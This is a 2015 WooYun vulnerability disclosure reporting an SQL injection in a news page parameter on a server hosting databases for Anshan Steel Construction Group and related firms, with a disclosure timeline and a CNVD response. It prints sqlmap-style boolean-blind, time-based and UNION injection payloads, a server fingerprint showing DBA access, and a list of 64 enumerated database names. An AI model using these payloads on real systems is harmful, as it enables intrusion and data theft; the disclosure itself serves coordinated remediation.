当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163213

漏洞标题:鞍钢建设集团SQL注入漏洞泄露64库

相关厂商:鞍钢建设集团

漏洞作者: 路人甲

提交时间:2015-12-24 13:34

修复时间:2016-02-09 23:23

公开时间:2016-02-09 23:23

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-24: 细节已通知厂商并且等待厂商处理中
2015-12-28: 厂商已经确认,细节仅向厂商公开
2016-01-07: 细节向核心白帽子及相关领域专家公开
2016-01-17: 细节向普通白帽子公开
2016-01-27: 细节向实习白帽子公开
2016-02-09: 细节向公众公开

简要描述:

鞍钢建设集团有限公司是具有近七十年的发展史的国家特级总承包大型综合性建筑施工企业,行业设计甲级。中国承包商企业48强,辽宁省建筑施工企业十强,并多次排名第一。
集团下设22个专业分公司、全资子公司及控股公司。在职职工总数7126人。

详细说明:

已查实的公司如下:
新能源汽车公司ACC--http://**.**.**.**/
鞍山市第八建设工程有限公司--http://**.**.**.**/
辽宁通用机械集团旗下鞍山无油空压机有限公司--http://**.**.**.**/gsjj.htm
鞍山泰利德电子有限公司--http://**.**.**.**/
鞍山市盈溢贸易有限公司--http://**.**.**.**/gsjj.php
鞍山新新化工有限公司--http://**.**.**.**/
鞍钢建设集团有限公司--http://**.**.**.**/qyjj.php
大金,是专业的跨国空调生产企业--http://**.**.**.**/gsjj.php
鞍钢房产建设有限公司--http://**.**.**.**/main/xwzx.aspx?nid=168
鞍山市瀛海威信息技术有限公司--http://**.**.**.**/index.php
辽宁金茂拍卖有限公司--http://**.**.**.**/index.php
.............其中不乏有物流、拍卖这样的敏感信息集中企业,其他就不查了,不知道能不能打个雷~

漏洞证明:

注入点:

http://**.**.**.**/newsPage.php?nsId=41


漏洞信息:

Parameter: nsId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nsId=41 AND 2530=2530
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: nsId=41 AND (SELECT * FROM (SELECT(SLEEP(5)))bsTU)
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: nsId=-6146 UNION ALL SELECT NULL,NULL,CONCAT(0x7170767871,0x784a6563486d4844486556567063747665674e58736d574247595a4765665469447a6d724569574d,0x7178626b71),NULL,NULL,NULL-- -
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.27
back-end DBMS: MySQL 5.0.12
current user is DBA: True


64库,很多都是一库一公司:

[*] #mysql50##db_mcc
[*] #mysql50##db_xdqc
[*] #mysql50##waipanqihuo_db
[*] #mysql50##zsmidtown_db
[*] #mysql50#db_asyy888 -
[*] agjs_db
[*] ashhcomcn
[*] db_21anshan
[*] db_asfcjz
[*] db_asglzj
[*] db_asyy888
[*] db_cake
[*] db_cfinfor
[*] db_dajin
[*] db_dh
[*] db_famen
[*] db_gjjg
[*] db_hsfd
[*] db_invoicing
[*] db_jdsoft
[*] db_jinmaogai
[*] db_jinpu
[*] db_jmpm
[*] db_jmpm_1
[*] db_jmpm_2015_11_24
[*] db_jmpm_2015_11_26
[*] db_jmpm_2015_11_27
[*] db_maiti
[*] db_mcc
[*] db_songyan
[*] db_sy
[*] db_tld
[*] db_xcdz
[*] db_xdqc
[*] db_xingang
[*] db_xingda
[*] db_xinxin
[*] db_yjjx
[*] db_ym
[*] db_ynr
[*] db_zdgj
[*] dfjyDb
[*] dongbei_db
[*] gxdz_db
[*] hanma_db
[*] information_schema
[*] lhsl_db
[*] mysql
[*] olgs
[*] performance_schema
[*] qbhDB
[*] sakila
[*] shida_db
[*] test
[*] travelzx_db
[*] waipanqihuo_db
[*] weixiao_db
[*] weixiao_db_20151125
[*] weixiao_db_2015_11_20
[*] weixiao_db_2015_11_25
[*] world
[*] xinghe_db
[*] xxcpaDB
[*] zsmidtown_db


随便看了一下,就不细挖数据量了

修复方案:

先过滤注入点再说吧~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-28 18:53

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给辽宁分中心,由其后续协调网站管理单位处置.

最新状态:

暂无